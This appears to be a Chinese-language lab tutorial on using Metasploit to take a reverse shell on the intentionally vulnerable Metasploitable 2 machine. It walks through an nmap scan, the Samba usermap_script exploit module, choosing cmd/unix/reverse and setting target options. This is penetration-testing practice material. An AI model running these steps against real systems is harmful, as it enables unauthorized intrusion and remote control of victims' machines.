metasploit拿Metasploitable 2 shell
進入metasploit系統
msfconsole
Nmap埠掃描
nmap –sV IP(或者域名),如果機器設定有防火牆禁ping,可以使用nmap -P0(或者-Pn) –sV IP(或者域名),通過這兩個命令可以檢視主機的開放情況:
滲透最重要的兩個引數是開放狀態和版本號, 版本號也就是系統掃描中,在開發安全掃描件裡經常提及的漏洞指紋,因為大部分漏洞的產生就是某一版本的問題. 通過nmap主要是知道埠開放情況(STATE)和指紋資訊(服務名稱和版本號),然後可以根據指紋資訊百度,該版本是否存在漏洞
1>使用search命令查詢相關模組
search Name 本例就是:search samba
2>使用use排程模組
找到了我們需要攻擊的目標模組,我們就使用它,通過命令:use ExploitName
該例就是:use exploit/multi/samba/usermap_script。
3>使用info檢視模組資訊
這步最簡單,就是在上步的基礎上,輸入info就行
4>選擇payload作為攻擊
選擇payload,首先我們要看能使用哪些引數,通過命令:show payloads:
在選擇攻擊載荷的時候,建議選用和meterpreter和reverse相關的載荷。
通過使用命令:set payload PayloadName。該例為:set payload cmd/unix/reverse:
技巧:
a、 meterpreter在metasploit中有什麼瑞士尖刀的稱呼,可以很好的做到後滲透攻擊以及內網滲透,可以參看meterpreter使用。
b、 reverse解釋是反彈,由於你攻擊的目標機可能處在內網裡,所以你攻擊的時候存在埠對映等方面的問題,所以如果使用反彈,這個可以更穩定。
5>設定攻擊引數
首先通過show options或者options,檢視需要填寫的引數:
例: 目標機器 set RHOST ip set RPORT port
再次使用options檢視引數是否完整,然後使用exploit或者run就行了,對於部分攻擊模組,可以使用check來判斷